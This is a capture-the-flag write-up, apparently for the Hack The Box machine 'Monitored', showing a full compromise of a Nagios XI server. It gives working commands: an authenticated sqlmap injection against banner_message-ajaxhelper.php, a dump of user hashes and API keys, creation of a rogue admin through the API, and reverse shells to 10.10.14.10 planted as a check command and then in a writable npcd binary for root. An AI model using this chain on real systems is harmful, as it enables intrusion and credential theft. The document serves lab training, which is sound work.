🕳️

Monitored

 
22,80,389,443,5667 monitored.htb nagios.monitored.htb
found in ports 443 by gobuster https://nagios.monitored.htb/nagiosxi/terminal/ https://nagios.monitored.htb/nagiosxi/login.php
 
from udp scan:
notion image
 
sudo nmap -sU -sC -sV -T4 --min-rate=500 monitored.htb -p161,162
found credentials from snmp (result from nmap scan port 161)
notion image
svc:XjH7VCehowpR1xZB
the credential is not valid for login page we gained from previous stages
let’s see if there is any other login page
 
try
notion image
with creds, then we get
notion image
searching on exploitation from googling
notion image
https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php
get the POST-auth by curl , then try sqlmap
notion image
notion image
 
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs
notion image
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables
notion image
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
notion image
Database: nagiosxi Table: xi_users [2 entries] +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | user_id | name | email | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change | +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ | 1 | Nagios Administrator | admin@monitored.htb | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 | | 2 | svc | svc@monitored.htb | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705298638 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 6 | 1699697433 | +---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
Add a new user by using admin’s api_key IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL
curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=ivan&password=123456&name=ivan&email=ivan@gmail.com&auth_level=admin"
notion image
we have
ivan:123456 then login, required change to 123123
notion image
add a check commands here, we set a rev shell. then apply configuration
notion image
bash -c 'bash -i >& /dev/tcp/10.10.14.10/6666 0>&1'
go to hosts to activate it
notion image
notion image
notion image
get the user shell
notion image
 
sudo -l User nagios may run the following commands on localhost: (root) NOPASSWD: /etc/init.d/nagios start (root) NOPASSWD: /etc/init.d/nagios stop (root) NOPASSWD: /etc/init.d/nagios restart (root) NOPASSWD: /etc/init.d/nagios reload (root) NOPASSWD: /etc/init.d/nagios status (root) NOPASSWD: /etc/init.d/nagios checkconfig (root) NOPASSWD: /etc/init.d/npcd start (root) NOPASSWD: /etc/init.d/npcd stop (root) NOPASSWD: /etc/init.d/npcd restart (root) NOPASSWD: /etc/init.d/npcd reload (root) NOPASSWD: /etc/init.d/npcd status (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php * (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php * (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh * (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
The shell is unstable. We upload a ssh public key to enhance the compatibility of our shell.
Generate a pair of keys
ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCatX96WZAHuhuaZ4Q9V1VvAVygN+HktXmEnX4gYcbjE8lWeYG4gszN4zLzZQY9pgtMBurbVh6d9a4kqJPIx/ASig2qij4T00b5IcjX4a6jDMF1NzNribsQoy8DGCYVSNMoFLzmu4MA3jhg17bwUoMey7eL6CkWyNbCiHIp+RCBXqxYB9m4G1XRTKSMxXn0IovMxhr5w/yywxTHdh0kmwLdqhyNGaFVWNnyT/YCV0nZ2vAzETAS7FkcFG3ZJ0CrI2NDOLqMqYg4Fu+2+fV2jo2BfTarO201GJ0VkDYjbiyXZImDj5N3uehDtQEbFb04n3xUFtqL3WOM1+N6d4+NR6JE8B9tcKRShgrAtpY2hnaZgRF2vHoKViiPEsdV/BtZFLUnHXFaulqiL+sGMeZoGMCsyAxWzrLqa2geaEsA468onLB9S/b2Y/I0crSxxZvhvPumdO2gYGBWZpEsoOoWCQSNxIr1SkhwtTa0MRb+iBVmT47VHF2dX7KsZy1kZVswgT3g1n/OnqhdwBgjaJLa7HXE2RgqayWJ1Rf/Oz+aB/vjlJLLgqkkCJjWIcyX9XZDGWPK7cPMe40ZYpIJdqwauHEUgz3DdZzX3qmKxwnmxBdhJvfdT4mjI0Fyzj+dGDRaMZuGRBgHj7hhIEYrjskQLCIKLkQmVymIkmF4MgaWB72Apw==" > ~/.ssh/authorized_keys
then upload the public key
mkdir ~/.ssh
vi ~/.ssh/authorized_keys
notion image
ssh -i ~/.ssh/id_rsa nagios@monitored.htb
then connect it by ssh
Run linpeas.sh
notion image
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios /etc/systemd/system/multi-user.target.wants/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd /etc/systemd/system/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
vi /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
vi /usr/local/nagios/bin/npcd
#!/bin/bash bash -i >& /dev/tcp/10.10.14.10/4444 0>&1
notion image
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
get the root
notion image